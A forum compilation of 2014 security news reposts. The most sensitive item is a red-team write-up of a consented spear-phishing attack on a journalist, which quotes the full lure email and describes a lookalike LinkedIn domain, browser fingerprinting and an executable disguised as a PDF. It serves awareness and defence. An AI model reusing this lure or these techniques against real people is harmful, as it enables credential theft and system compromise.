Why Facebook Just Launched Its Own ‘Dark Web’ Site By Andy Greenberg 10.31.14 | 12:31 pm | Facebook has never had much of a reputation for letting users hide their identities online. But now the world’s least anonymous website has just joined the Web’s most anonymous network. In a first-of-its-kind move for a Silicon Valley giant, Facebook on Friday launched a Tor hidden service, a version of its website that runs the anonymity software Tor. That new site, which can only be accessed by users running the Tor software, bounces users’ connections through three extra encrypted hops to random computers around the Internet, making it far harder for any network spy observing that traffic to trace their origin. Inviting users to connect to Facebook over Tor may seem like a strange move; given that Facebook still requires you to log in and doesn’t allow pseudonyms (in most cases), even Tor users on the site are hardly anonymous to Facebook itself. But even so, Tor users on Facebook can now protect their identities from every other online snoop that would want to unmask them. “No, you’re not anonymous to Facebook when you log in, but this provides a huge benefit for users who want security and privacy,” says Runa Sandvik, a former Tor developer who Facebook credits with advising the project in a blog post. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.” Tor, after all, doesn’t just let users hide their identities from the sites they visit, anonymously buying drugs on the Silk Road or uploading leaked documents to news sites through the leak platform SecureDrop. It’s also designed to circumvent censorship and surveillance that occurs much closer to the user’s own connection, such as in repressive regimes like Iran or China. And since Facebook uses SSL encryption, no surveillance system watching either Facebook’s connection or the user’s local traffic should be able to match up a user’s identity with their Facebook activity. “You get around the censorship and local adversarial surveillance, and it adds another layer of security on top of your connection.” Until now, Facebook has made it difficult for users to access its site over Tor, sometimes even blocking their connections. Because Tor users appear to log in from unusual IP addresses all over the world, they often trigger the site’s safeguards against botnets, collections of hijacked computers typically used by hackers to attack sites. Facebook security engineer Alec Muffett Doc Searls / Flickr “Tor challenges some assumptions of Facebook’s security mechanisms—for example its design means that from the perspective of our systems a person who appears to be connecting from Australia at one moment may the next appear to be in Sweden or Canada,” writes Facebook security engineer Alec Muffett. “Considerations like these have not always been reflected in Facebook’s security infrastructure, which has sometimes led to unnecessary hurdles for people who connect to Facebook using Tor.” Facebook’s Tor site is designed to be friendlier to those far-flung connections. And Sandvik says it also provides an extra layer of security than running Tor on the user’s end alone can provide. Tor users are often warned about malicious “exit nodes”, the final computer bouncing their traffic around the Internet. Such exit nodes can sometimes be used to spy on their unencrypted traffic or in some cases, even strip that encryption away. When both the user and Facebook are running Tor, however, the traffic doesn’t leave the Tor network until it’s safely within Facebook’s infrastructure. Over the past few years, sites like Google, Facebook, Twitter, and Google have all implemented default SSL encryption to protect users’ traffic. Sandvik sees Facebook’s Tor hidden service as a sign that Tor may be the next basic privacy protection Silicon Valley companies will be expected to offer their users. “I would be really excited to see other tech companies that want to do the same,” she says. “And I’d love to help them.” Sursa: Why Facebook Just Launched Its Own 'Dark Web' Site | WIRED

Hacking a Reporter: UK Edition Over the summer, a U.K. journalist asked the Trustwave SpiderLabs team to target her with an online attack. You might remember that we did the same in 2013 by setting our sites on a U.S.-based reporter. This scenario, however, would differ from the first. The reporter, Sophie, was our only target. Co-workers, company or family were off limits. Sophie wrote about the experience from her perspective here. Below, we’ll tell the story from the perspective of Trustwave SpiderLabs, playing the role of “theoretical” attacker. Online, some readers criticized Sophie for being too naïve when it came to the attack. There could be some truth to that, but we would say that with great pretext a well-executed attack rarely fails, no matter the target (and zero-days are rarely required). We’re not saying this out of pride or to take it easy on Sophie. It’s just our experience. To hedge against the risk of failure, we proposed a two-to-three stage attack. We described the first stage as a demonstration of passive information gathering and later stages only as "more active". At a high level, we approached the project as follows: Stages of activity Passive information gathering/reconnaissance Active fingerprinting Active attack First, we performed reconnaissance on Sophie and identified her potential cellphone model, her corporate e-mail address, some of her social network profiles and much more. This was a good starting point, but to increase the chance of success its helps greatly to know what operating system the target uses and fingerprint her system(s) as much as possible. Fingerprinting: First Attempt In our first attempt to fingerprint her, we created a Gmail account using a fake, Latin name (we’ll explain why later). From that account, we sent a few e-mails to Sophie asking whether we could meet her. We included a hidden image in an attempt to fingerprint her system when it loaded the image. The e-mail was purposefully vague about the details of any in-person meet because people tend to be curious, and we expected Sophie to reply asking for more details and consequently open additional attack vectors. We never received a response or a proper fingerprint because Gmail prevented it as Google image’s proxy downloaded the images. Fingerprinting: Second Attempt As part of our second fingerprinting attempt, we registered a domain that resembled the Linkedin domain—“linkedhn.com.” We sent an e-mail to Sophie that mimicked the one sent by Linkedin when a user invites you to connect. We sent the e-mail masquerading as a supposed colleague of Sophie’s. If she chose to confirm the connection, the message would lead Sophie to the login page for our cloned Linkedin website. Sophie opened our counterfeit invite but did not log in. We were, however, able to fingerprint the target system using the BeEF framework. We enumerated her plugins, OS version, location, and much more. In short, we identified that Windows 7 with Java 1.7 update 51 and Microsoft Office 2010 were in use. We then quickly lost our browser hook and no further attacks were launched. Although seemingly small, this first victory was important. Blind attacks—when not launched against massive groups of potential targets—are unlikely to succeed against a single individual. Below you see some of the system information we were able to gather. After allowing some time to elapse, we revived our fake gmail account that used a Latin name. We used it to introduce ourselves and lend more credibility to our subsequent pretext. We created a new account called "UK.Leaks.Team@gmail.com" and sent the following, fictitious e-mail to our target three days before Brazil’s presidential election. Sophie, We are part of a Worldwide activist group and write to you again as one of our local collaborators tried to contact you a few weeks ago using the alias Ricardo Almeida to protect his identify, but unfortunately you haven’t replied. We want to talk to you because we have obtained confidential files from the UK government and are currently working with newspapers from different countries. At the time of writing we already have agreements with national newspapers from the USA, Germany, Italy, France, Brazil, Argentina and South Africa. The document in reference must be released on October 3rd, 2014; two days before the Brazilian Election Day. … We would like to invite The [REDACTED] to be a primary channel for public disclosure of this document and attach a partial extract for your initial review. If you agree to publish an article in accordance with our coordinated global release date of October 3rd, we will send the full document and related files for your review. Please be aware we are a not-for-profit group and our identities must remain private to protect individuals involved. Viewing Instructions?? The attached file is compressed and encrypted with a strong password "![REDACTED]Curtis7482" (without quotes), in order to reduce the file size and increase the security of our communication. If you are using Windows you may need to copy the attached .rar file outside Outlook to be able to open it since the file is encrypted, as follows: You will need a tool to extract .rar files, for example Winrar, 7Z, etc. The steps below are based on Winrar. Copy the attached file to your "Documents” folder. On the "Documents” folder, right click on "UK Leaks Proof – [REDACTED].rar", choose "extract here" and insert the password. A new file will be created called "UK Leak #12 - BR Voting System.pdf", which can be double clicked to open. We hope you find the extract enlightening and are waiting for your answer. Sincerely. UK Leaks Team? The contents of this message are confidential and may be privileged. Copying or disclosing is prohibited. Guess what? She opened the e-mail and followed the instructions. Originally she hesitated, but it seems her appetite for a scoop overwhelmed her reluctance. Put yourself in her place. She is a journalist for a big newspaper, and she’s contacted by a supposed anonymous leaker with ground-breaking news about electoral fraud. What would you do? You probably wouldn’t let security best practice get in the way of a potential exclusive! Maybe you’d think twice, but you might also put faith in your antivirus program and have a look at the attachment. Here’s the e-mail displayed on her computer: Her use of the Webmail interface caught our attention. Later, we discovered that she seemed to be using a different computer as the fingerprint in this case differed from the original. We used an old trick to impersonate the binary and make it look like a valid PDF file. Because Gmail prohibits sending a direct executable, usually we hide it inside a .zip file. Gmail also blocked the .zip file and so in the end we were forced to use something less common. We chose to use a .rar file and adapt the pretext to it. We hypothesized that since Sophie was a technology journalist, she might already have Winrar installed. Below is how the fake PDF file appeared to Sophie on her computer once she followed the instructions: It looks like a genuine attachment, right? A clue that reveals something might be amiss is its description as “application” in the “type” column. Many people might ignore it, but it’s worth checking that description to avoid such social engineering hacks. Another feature we added was that every time the fake PDF was opened, it paused for a few seconds and displayed a pop-up message stating “Access was denied.” We hoped this might lead to her double-clicking the file again or trying to open it using another computer. It worked! As a result we got 6 different connections and shells from her laptop. We packed the executable with a private packer that at the time had a very low rate of detection. The payload is a variation of the 3 in 1 described in this blog post. At one point she replied to our e-mail agreeing to the release date and saying she planned to open the file immediately. As you’ll see below, warnings from security software on her system raised her suspicions. But in spite of her reservations: the pressure of the release date, the potential for a scoop that could affect her career in a positive way, and her confidence in her security software led to the compromise of her system. After her original reply, it took her another 25 minutes to execute the file. We think this might have been a symptom of her trepidation. We delayed our response to let the pressure and phony urgency work its magic. Once she sent her second response expressing her concerns that it was a scam, it was too late—she was already compromised. But, had this particular attack failed, her asking us for proof gave us a second chance to try another attack vector had we needed it. We think she may be thinking to herself, "Did I just do something I shouldn't have?!" As we showed you earlier, Sophie was using the Gmail web interface with Chrome. She also had OpenOffice, which is less common. The computer was not running with elevated privileges, but as you know, there are ways to escalate privileges even on a fully patched computer (but that’s a topic for another blog post). Once we established command and control on her system, there isn’t anything we couldn't have done. We did consider one of the most interesting avenues to be piggy-backing onto the corporate VPN connection, stealing credentials, and then exploring the file-shares and other resources used by Sophie and potentially her colleagues. The sky was the limit. What can we take away from this? Organizations should consider the following: Raise awareness and educate employees on the potential perils of social engineering attacks. Review gaps in perimeter anti-malware defenses (particularly e-mail and web gateways). If security gateway technology is already in place, be sure it’s configured to be effective and that it’s tested. Regular patching and updating of systems and software is not just for servers. Patching end-user systems and software should be a structured, on-going activity. Understand that the compromise of a user laptop can lead to pivoted attacks against the internal corporate network, even if the compromised user is working from home. For example, attackers could pivot through any corporate VPN connections that are, or will be, established by that remote user. As a footnote to this post it’s worth mentioning that often we get asked, “what’s the point of social engineering, you’re always going to get in”. To be fair, that is a pretty accurate statement. The value of social engineering engagements comes partly from testing resilience, but more so more from raising employee awareness of what is possible when they are targeted. Posted by SpiderLabs Anterior on 28 October 2014 Sursa: Hacking a Reporter: UK Edition - SpiderLabs Anterior

[h=2]OpenBSD 5.6[/h] Released Nov 1, 2014 Copyright 1997-2014, Theo de Raadt. ISBN 978-0-9881561-4-2 5.6 Song: "Ride of the Valkyries" Order a CDROM from our ordering system. See the information on the FTP page for a list of mirror machines. Go to the pub/OpenBSD/5.6/ directory on one of the mirror sites. Have a look at the 5.6 errata page for a list of bugs and workarounds. See a detailed log of changes between the 5.5 and 5.6 releases. signify(1) pubkeys for this release: base: RWR0EANmo9nqhpPbPUZDIBcRtrVcRwQxZ8UKGWY8Ui4RHi229KFL84wV fw: RWT4e3jpYgSeLYs62aDsUkcvHR7+so5S/Fz/++B859j61rfNVcQTRxMw pkg: RWSPEf7Vpp2j0PTDG+eLs5L700nlqBFzEcSmHuv3ypVUEOYwso+UucXb All applicable copyrights and credits can be found in the applicable file sources found in the files src.tar.gz, sys.tar.gz, xenocara.tar.gz, or in the files fetched via ports.tar.gz. The distribution files used to build packages from the ports.tar.gz file are not included on the CDROM because of lack of space. [h=3]What's New[/h] This is a partial list of new features and systems included in OpenBSD 5.6. For a comprehensive list, see the changelog leading to 5.6. LibreSSL This release forks OpenSSL into LibreSSL, a version of the TLS/crypto stack with goals of modernizing the codebase, improving security, and applying best practice development processes. No support for legacy MacOS, Netware, OS/2, VMS and Windows platforms, as well as antique compilers. Removal of the IBM 4758, Broadcom ubsec, Sureware, Nuron, GOST, GMP, CSwift, CHIL, CAPI, Atalla and AEP engines, either because the hardware is irrelevant, or because they require external non-free libraries to work. No support for FIPS-140 compliance. No EBCDIC support. No support for big-endian i386 and amd64 platforms. Use standard routines from the C library (malloc, strdup, snprintf...) instead of rolling our own, sometimes badly. Remove the old OpenSSL PRNG, and rely upon arc4random_buf from libc for all the entropy needs. Remove the MD2 and SEED algorithms. Remove J-PAKE, PSK and SRP (mis)features. Aggressive cleaning of BN memory when no longer used. No support for Kerberos. No support for SSLv2. No support for the questionable DTLS heartbeat extension. No support for TLS compression. No support for US-Export SSL ciphers. Do not use the current time as a random seed in libssl. Support for ChaCha and Poly1305 algorithm. Support for Brainpool and ANSSI elliptic curves. Support for AES-GCM and ChaCha20-Poly1305 AEAD modes. [*]Improved hardware support, including: SCSI Multipathing support via mpath(4) and associated path drivers on several architectures. New qlw(4) driver for QLogic ISP SCSI HBAs. New qla(4) driver for QLogic ISP2100/2200/2300 Fibre Channel HBAs. New upd(4) sensor driver for USB Power Devices (UPS). New brswphy(4) driver for Broadcom BCM53xx 10/100/1000TX Ethernet PHYs. New uscom(4) driver for simple USB serial adapters. New axen(4) driver for ASIX Electronics AX88179 10/100/Gigabit USB Ethernet devices. The inteldrm(4) and radeondrm(4) drivers have improved suspend/resume support. The userland interface for the agp(4) driver has been removed. The rtsx(4) driver now supports card readers based on the RTS5227 and RTL8402 chipsets. The firmware for the run(4) driver has been updated to version 0.33. The run(4) driver now supports devices based on the RT3900E chipset. The zyd(4) driver, which was broken for some time, has been fixed. The bwi(4) driver now works in systems with more than 1GB of RAM. The re(4) driver now supports devices based on the RTL8168EP/8111EP, RTL8168G/8111G, and RTL8168GU/8111GU chipsets. [*]Generic network stack improvements: divert(4) now supports checksum offload. IPv6 is now turned off on new interfaces by default. Assigning an IPv6 address will enable IPv6 on an interface. Support for RFC4620 IPv6 Node Information Queries has been removed. The kernel no longer supports the SO_DONTROUTE socket option. The getaddrinfo(3) function now supports the AI_ADDRCONFIG flag defined in RFC 3493. Include router alert option (RAO) in IGMP packets, as required by RFC2236. ALTQ has been removed. The hash table for Protocol Control Block (PCB) of TCP and UDP now resize automatically on load. [*]Installer improvements: Remove ftp and tape as install methods. Preserve the disklabel (and next 6 blocks) when installing boot block on 4k-sector disk drives. Change the "Server?" question to "HTTP Server?" to allow unambiguous autoinstall(8) handling. Allow autoinstall(8) to fetch and install sets from multiple locations. Many sample configuration files have moved from /etc to /etc/examples. [*]Routing daemons and other userland network improvements: When used with the -v flag, tcpdump(8) now shows the actual bad checksum within the IP/protocol header itself and what the good checksum should be. ftp(1) now allows its User-Agent to be changed via the -U command-line option. The -r option of ping(8) and traceroute(8) has been removed. ifconfig(8) can now explicitly assign an IPv6 link-local address and turn IPv6 autoconf on or off. ifconfig(8) has been made smarter about parsing WEP keys on the command line. ifconfig(8) scan now shows the encryption type of wireless networks (WEP, WPA, WPA2, 802.1x). MS-CHAPv1 (RFC2433) support has been removed from pppd(8). traceroute6(8) has been merged into traceroute(8). The asr API for asynchronous address resolution and nameserver querying is now public. pflow(4)'s pflowproto 9 has been removed. The userland ppp(8) daemon and its associated PPPoE helper, pppoe(8), have been removed. snmpd(8), snmpctl(8), and relayd(8) now communicate via the AgentX protocol. relayd(8) has a new filtering subsystem, where the new configuration language uses last-matching pf-like rules. The new relayd(8) filter rules now support URL-based relaying. relayd(8) now uses privilege separation for private keys. This acts as an additional mitigation to prevent leakage of the private keys from the processes doing SSL/TLS. New httpd(8) HTTP server with FastCGI and SSL support. [*]OpenSMTPD 5.4.3 (includes changes to 5.4.2): New/changed features: OpenSMTPD replaces Sendmail as the default MTA. Queue process now runs under a different user for better isolation. Merged MDA, MTA and SMTP processes into a single unprivileged process. Killed the MFA process, it is no longer needed. Added support for email addresses lookups in the table_db backend. Added RSA privilege separation support to prevent possible private key leakage. [*]The following significant bugs have been fixed in this release: Minor bug fixes in some corner cases of the routing logic. The enqueuer no longer adds its own User-Agent. Disabled profiling code, allowing all processes to rest rather than waking up every second. Reworked the purge task to avoid disk-hits unless necessary... only once at startup. Fix various header parsing bugs in the local enqueuer. Assorted minor fixes and code cleanups. [*]Security improvements: Changed the heuristics of the stack protector to also protect functions with local array definitions and references to local frame addresses. This matches the -fstack-protector-strong option of upstream GCC. Position-independent executables (PIE) are now used by default on powerpc. Removed Kerberos. Default bcrypt hash type is now $2b$. Remove md5crypt support. Improved easier to use bcrypt API is now available. Increase randomness of random mmap mappings. Added getentropy(2). Added timingsafe_memcmp(3). Removed the MD4 hash algorithm and functions from cksum(1), S/Key, and libc. gets(3) has been removed. Added reallocarray(3), which allows multiple sized objects to be allocated without the cost of clearing memory while avoiding possible integer overflows. Extended fread(3) and fwrite(3) to check for integer overflows. [*]Assorted improvements: locate databases for both base and xenocara, as /usr/lib/locate/src.db and /usr/X11R6/lib/locate/xorg.db. Much faster package updates, due to package contents reordering that precludes re-downloading unchanged files. Fix many programs that failed when accessing disks having sector sizes other than 512 bytes, including badsect(8), df(1), dump(8), dumpfs(8), fsck_ext2fs(8), fsck_ffs(8), fsdb(8), growfs(8), ncheck_ffs(8), quotacheck(8), tunefs(8). Constrain MSDOS timestamps to 1/1/1980 through 12/31/2107. 64-bit time_t values outside that range are stored as 1/1/1980. bs(6) now prints a battleship splash screen. rcp, rsh, rshd, rwho, rwhod, ruptime, asa, bdes, fpr, mkstr, page, spray, xstr, oldrdist, fsplit, uyap, and bluetooth have been removed. rmail(8) and uucpd(8) have been removed from the base system and added to the ports tree. Lynx has been removed from the base system and added to the ports tree. TCP Wrappers have been removed. Fix atexit(3) recursive handlers. Enhance disklabel(8) to recover filesystem mountpoint information when reading saved ascii labels. Properly handle msgbuf_write(3) EOF conditions, including uses in tmux(1), dvmrpd(8), ldapd(8), ldpd(8), ospf6d(8), ospfd(8), relayd(8), ripd(8), smtpd(8), ypldap(8). Constrain fdisk(8) '-l' to disk sizes of 64 blocks or more. Sync fdisk(8) built-in MBR with current /usr/mdec/mbr. Quiet dhclient(8) '-q' even more. Log less redundant dhclient(8) info. New leases, lease renewals, cable state changes more obvious to applications monitoring dhclient(8) files. Preserve chronological order of leases in the dhclient.leases(5) leases files. Use 'lease {}' statements in dhclient.conf(5), allowing interfaces to get an address when no dynamic lease is available. Improve dhclient(8) parsing and printing of classess static routes. Eliminate unnecessary rewrites of resolv.conf(5) by dhclient(8). Added sendsyslog(2): syslog(3) now works even when out of file descriptors or in a chroot. Added errc(3), verrc(3), warnc(3) and vwarnc(3). Faster hibernate/unhibernate performance on amd64 and i386 platforms. Support hibernating to softraid(4) crypto volumes. Improved performance of seekdir(3) to start of current buffer. Added <endian.h> per the revision of the POSIX spec in progress. Apache has been removed. Read support for ext4 filesystems. Reworked mplocks as ticket locks instead of spinlocks on amd64, i386, and sparc64. This provides fairer access to the kernel lock between logical CPUs, especially in multi socket systems. [*]OpenSSH 6.7 Potentially-incompatible changes: sshd(8): The default set of ciphers and MACs has been altered to remove unsafe algorithms. In particular, CBC ciphers and arcfour* are disabled by default. sshd(8): Support for tcpwrappers/libwrap has been removed. OpenSSH 6.5 and 6.6 have a bug that causes ~0.2% of connections using the "curve25519-sha256@libssh.org" KEX exchange method to fail when connecting with something that implements the specification correctly. OpenSSH 6.7 disables this KEX method when speaking to one of the affected versions. [*]New/changed features: Major internal refactoring to begin to make part of OpenSSH usable as a library. So far the wire parsing, key handling and KRL code has been refactored. Please note that we do not consider the API stable yet, nor do we offer the library in separable form. ssh(1), sshd(8): Add support for Unix domain socket forwarding. A remote TCP port may be forwarded to a local Unix domain socket and vice versa or both ends may be a Unix domain socket. ssh(1), ssh-keygen(1): Add support for SSHFP DNS records for Ed25519 key types. sftp(1): Allow resumption of interrupted uploads. ssh(1): When rekeying, skip file/DNS lookups of the hostkey if it is the same as the one sent during initial key exchange. (bz#2154) sshd(8): Allow explicit ::1 and 127.0.0.1 forwarding bind addresses when GatewayPorts=no; allows client to choose address family. (bz#2222) sshd(8): Add a sshd_config(5) PermitUserRC option to control whether ~/.ssh/rc is executed, mirroring the no-user-rc authorized_keys option. (bz#2160) ssh(1): Add a %C escape sequence for LocalCommand and ControlPath that expands to a unique identifer based on a hash of the tuple of (local host, remote user, hostname, port). Helps avoid exceeding miserly pathname limits for Unix domain sockets in multiplexing control paths. (bz#2220) sshd(8): Make the "Too many authentication failures" message include the user, source address, port and protocol in a format similar to the authentication success/failure messages. (bz#2199) Added unit and fuzz tests for refactored code. [*]The following significant bugs have been fixed in this release: sshd(8): Fix remote forwarding with same listen port but different listen address. ssh(1): Fix inverted test that caused PKCS#11 keys that were explicitly listed in ssh_config(5) or on the commandline not to be preferred. ssh-keygen(1): Fix bug in KRL generation: multiple consecutive revoked certificate serial number ranges could be serialised to an invalid format. Readers of a broken KRL caused by this bug will fail closed, so no should-have-been-revoked key will be accepted. ssh(1): Reflect stdio-forward ("ssh -W host:port ...") failures in exit status. Previously we were always returning 0. (bz#2255) ssh(1), ssh-keygen(1): Make Ed25519 keys' title fit properly in the randomart border. (bz#2247) ssh-agent(1): Only cleanup agent socket in the main agent process and not in any subprocesses it may have started (e.g. forked askpass). Fixes agent sockets being zapped when askpass processes fatal(). (bz#2236) ssh-add(1): Make stdout line-buffered; saves partial output getting lost when ssh-add(1) fatal()s part-way through (e.g. when listing keys from an agent that supports key types that ssh-add(1) doesn't). (bz#2234) ssh-keygen(1): When hashing or removing hosts, don't choke on "@revoked" markers and don't remove "@cert-authority" markers. (bz#2241) ssh(1): Don't fatal when hostname canonicalisation fails and a ProxyCommand is in use; continue and allow the ProxyCommand to connect anyway (e.g. to a host with a name outside the DNS behind a bastion). scp(1): When copying local->remote fails during read, don't send uninitialised heap to the remote end. sftp(1): Fix fatal "el_insertstr failed" errors when tab-completing filenames with a single quote char somewhere in the string. (bz#2238) ssh-keyscan(1): Scan for Ed25519 keys by default. ssh(1): When using VerifyHostKeyDNS with a DNSSEC resolver, down-convert any certificate keys to plain keys and attempt SSHFP resolution. Prevents a server from skipping SSHFP lookup and forcing a new-hostkey dialog by offering only certificate keys. sshd(8): Avoid crash at exit via NULL pointer reference. (bz#2225) Fix some strict-alignment errors. [*]mandoc 1.13.0: New implementation of apropos(1), whatis(1), and makewhatis(8) based on SQLite3 databases. Substantial improvements of mandoc(1) error and warning messages. Almost complete implementation of roff(7) numerical expressions. About a dozen minor new features and numerous bug fixes. [*]Ports and packages: Over 8,800 ports. [*]Many pre-built packages for each architecture: [TABLE=width: 95%] [TR] [TD=width: 25%] i386: 8588 sparc64: 7965 alpha: 6278 sh: 2626 [/TD] [TD=width: 25%] amd64: 8588 powerpc: 8049 m88k: 2475 sparc: 3394 [/TD] [TD=width: 25%] arm: 5633 hppa: 6143 vax: 1995 [/TD] [TD=width: 25%] mips64: 4686 mips64el: 6697 [/TD] [/TR] [/TABLE] [*]Some highlights: GNOME 3.12.2 KDE 3.5.10 KDE 4.13.3 Xfce 4.10 MySQL 5.1.73 PostgreSQL 9.3.4 Postfix 2.11.1 OpenLDAP 2.3.43 and 2.4.39 Mozilla Firefox 31.0 Mozilla Thunderbird 31.0 GHC 7.6.3 LibreOffice 4.1.6.2 Emacs 21.4 and 24.3 Vim 7.4.135 PHP 5.3.28, 5.4.30 and 5.5.14 Python 2.7.8, 3.3.5 and 3.4.1 Ruby 1.8.7.374, 1.9.3.545, 2.0.0.481 and 2.1.2 Tcl/Tk 8.5.15 and 8.6.1 JDK 1.6.0.32 and 1.7.0.55 Mono 3.4.0 Chromium 36.0.1985.125 Groff 1.22.2 Go 1.3 GCC 4.6.4, 4.8.3 and 4.9.0 LLVM/Clang 3.5 (20140228) Node.js 0.10.28 [*]As usual, steady improvements in manual pages and other documentation. [*]The system includes the following major components from outside suppliers: Xenocara (based on X.Org 7.7 with xserver 1.15.2 + patches, freetype 2.5.3, fontconfig 2.11.1, Mesa 10.2.3, xterm 309, xkeyboard-config 2.11 and more) Gcc 4.2.1 (+ patches) and 3.3.6 (+ patches) Perl 5.18.2 (+ patches) Nginx 1.6.0 (+ patches) SQLite 3.8.4.3 (+ patches) Sendmail 8.14.8, with libmilter Bind 9.4.2-P2 (+ patches) NSD 4.0.3 Unbound 1.4.22 Sudo 1.7.2p8 Ncurses 5.7 Binutils 2.15 (+ patches) Gdb 6.3 (+ patches) Less 458 (+ patches) Awk Aug 10, 2011 version [h=3]How to install[/h] Following this are the instructions which you would have on a piece of paper if you had purchased a CDROM set instead of doing an alternate form of install. The instructions for doing an FTP (or other style of) install are very similar; the CDROM instructions are left intact so that you can see how much easier it would have been if you had purchased a CDROM instead. Sursa: OpenBSD 5.6

[h=1]Windows 8.1: Black Belt Security[/h] Date: October 31, 2014 from 10:15AM to 11:30AM Day 4 Hall 8.1 Room G WIN-B318 Speakers: Sami Laiho Download [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality MP4 file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality MP4 file. If you have a Windows Phone, iPhone, iPad, or Android device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 66.7 MB Mid Quality MP4 (Windows Phone, HTML5, iPhone) [h=3]File size[/h] 285.9 MB High Quality MP4 (iPad, PC, Xbox) MP4 (iPhone, Android) Learn why and how you should leverage the Windows 8.1 security technologies like BitLocker, AppLocker, UAC, Least Privilege and Remote Desktop Restricted Admin -mode. In this 75 minute bombardment against the Windows OS you will see scary hands-on examples on how to break into an unprotected OS. If you still need to convince your boss to give you budget for implementing more security measures you don't want to miss this! Sami's black belt session was evaluated as the best session in TechEd North America 2014, TechEd Australia 2013 and as the best session by an external speaker in TechEd Europe 2013. Sursa: Windows 8.1: Black Belt Security | TechEd Europe 2014 | Channel 9

1 November 2014 Microsoft OneDrive in NSA PRISM Tweet A sends: 1) Bitlocker keys are uploaded to OneDrive by 'device encryption'. "Unlike a standard BitLocker implementation, device encryption is enabled automatically so that the device is always protected. ... If the device is not domain-joined a Microsoft Account that has been granted administrative privileges on the device is required. When the administrator uses a Microsoft account to sign in, the clear key is removed, a recovery key is uploaded to online Microsoft account and TPM protector is created." What's New in BitLocker in Windows and Windows Server 2) Device encryption is supported by Bitlocker for all SKUs that support connected standby. This would include Windows phones. "BitLocker provides support for device encryption on x86 and x64-based computers with a TPM that supports connected stand-by. Previously this form of encryption was only available on Windows RT devices." What's New in BitLocker in Windows and Windows Server 3) The tech media and feature articles recognise this. "... because the recovery key is automatically stored in SkyDrive for you." Surface, BitLocker, and the future of encryption | ZDNet 4) Here's how to recover your key from Sky/OneDrive. "Your Microsoft account online. This option is only available on non-domain-joined PCs. To get your recovery key, go to ...onedrive.com..." BitLocker recovery keys: Frequently asked questions - Windows Help 5) SkyDrive (now named OneDrive) is onboarded to PRISM. (pg 26/27) http://hbpub.vo.llnwd.net/o16/video/olmk/holt/greenwald/NoPlaceToHide- Documents-Uncompressed.pdf Sursa: Microsoft OneDrive in NSA PRISM

After eight years of work, HTML5 is finalized HTML5 was designed to move the Web from serving static documents to becoming a full-fledged platform for building apps By Joab Jackson After nearly eight years of work, the World Wide Web Consortium (W3C) has finalized the HTML5 standard, bringing the basic Web technology firmly into the era of mobile devices and cloud-driven rich Internet applications. "HTML5 brings the next generation of the Web," said W3C CEO Jeff Jaffe. "It wasn't so long ago that the Web was about browsing static documents. Today's Web is a much richer platform." Although Web and mobile developers have been using parts of the HTML5 specification for several years, the finished specification -- which the W3C calls a recommendation -- ensures developers that the code they develop for the Web will work going forward. "We're now at a stable state that everyone can build to the standard and be certain that it will be implemented in all browsers," Jaffe said. "If we didn't have complete interoperability, we wouldn't have one Web." In 1989, physicist Tim Berners-Lee created the first version of the HTML as a way to format and link together written materials so they could be accessed over the Internet. In the years since, the resulting World Wide Web has come to serve billions of users all manner of content, from movies and music to full-fledged applications. The HTML5 final recommendation, over 1,370 pages in length, addresses this complex environment. HTML5 provides a way to serve multimedia content and application functionality without relying on proprietary plug-ins to the browser. It also addresses a wide range of other uses for the Web, such as delivering scalable vector graphics (SVG) and math annotations (MathML). Today, HTML5 provides a "write-once, run-anywhere" cross-platform alternative to writing applications for multiple mobile platforms, such as Android and Apple iOS devices, Jaffe said. About 42 percent of mobile application developers are using HTML, along with JavaScript and Cascading Style Sheets (CSS) to build their apps, according to a 2014 survey from mobile analysis firm Vision Mobile. The W3C hopes the specification will be a cornerstone for future work in what it calls the Open Web Platform, an even richer set of standards for building cross-platform vendor neutral online applications. Moving froward, the W3C is developing specifications for real-time communications, electronic payments and application development. It is also creating a set of safeguards for privacy and security. Ian Hickson, now employed at Google, served as the principal architect of the HTML5 specification, and engineers at Microsoft, IBM and Apple served as co-chairs for the working group. Over 45,000 emails were exchanged when drafting the document, from representatives of 60 companies. Sursa: After eight years of work, HTML5 is finalized | Computerworld

Exploiting CVE-2014-4113 on Windows 8.1 October 31, 2014 Moritz Jodeit <moritz@jodeit.org> Table of Contents 1 Introduction ..................................................................................................................................... 3 2 Vulnerability Details ........................................................................................................................ 3 3 Exploitation on Windows 8.1 .......................................................................................................... 4 3.1 Crafting the win32k!tagWND structure .................................................................................. 4 3.2 Finding an overwrite target ..................................................................................................... 6 3.3 Combining all steps ................................................................................................................. 8 4 Conclusion ....................................................................................................................................... 9 Download: http://www.jodeit.org/research/Exploiting_CVE-2014-4113_on_Windows_8.1.pdf

Easy Jailbreak 8.1 Untethered Guide – One Click Cydia Bundle Pangu 1.1: All iOS 8 Devices Posted in iPhone 5s, iPhone 6 Plus, Jailbreak 8.1 - 31 October 2014 - 28 comments How to Jailbreak 8.1 Untethered iOS 8 via Pangu 1.1 One-Clic Cydia Bundle on iPhone 6 Plus, 6 iPhone 5S, 4S and iPad Air 2, Mini 3, 4 – Pangu is on fire, they’ve done it again, we now have a simplified jailbreak 8.1 solution. Today, ensuing a plethora of recent developments and releases, the Pangu Team released a near-perfect iteration of their Pangu for iOS 8 utility that’s capable of providing an Untethered jailbreak on 8.1 for all iPhone, iPad and iPod touch models. While the group of Chinese-based hackers previously issued the first iteration of their jailbreak tool for iOS 8.1 last week, said tool was mostly intended for jailbreak tweak developers and advanced users – now, with today’s release, Pangu has pushed out a utility intended for the masses. The new Pangu 1.1 jailbreak iOS 8.1 tool finally comes bundled with Cydia (the graphical user interface, and distribution platform, for third-party iOS tweaks that has effectively monopolized the jailbreak scene). Jailbreaking 8.1 on the iPhone 6 Plus, iPhone 6, iPhone 5s, iPhone 5c, iPhone 4s, the new iPad Air 2 and iPad mini 3, the original iPad Air, the iPad Mini 2 with Retina display, iPad 4, the original iPad mini, iPad 3, iPad 2 and, last but certainly not least, the 5th generation iPod touch on 8.0 through 8.1 has never been easier! Continue reading past the break for complete instructions on how to jailbreak any of the aforementioned iDevices running 8.1 completely Untethered. How To Jailbreak 8.1 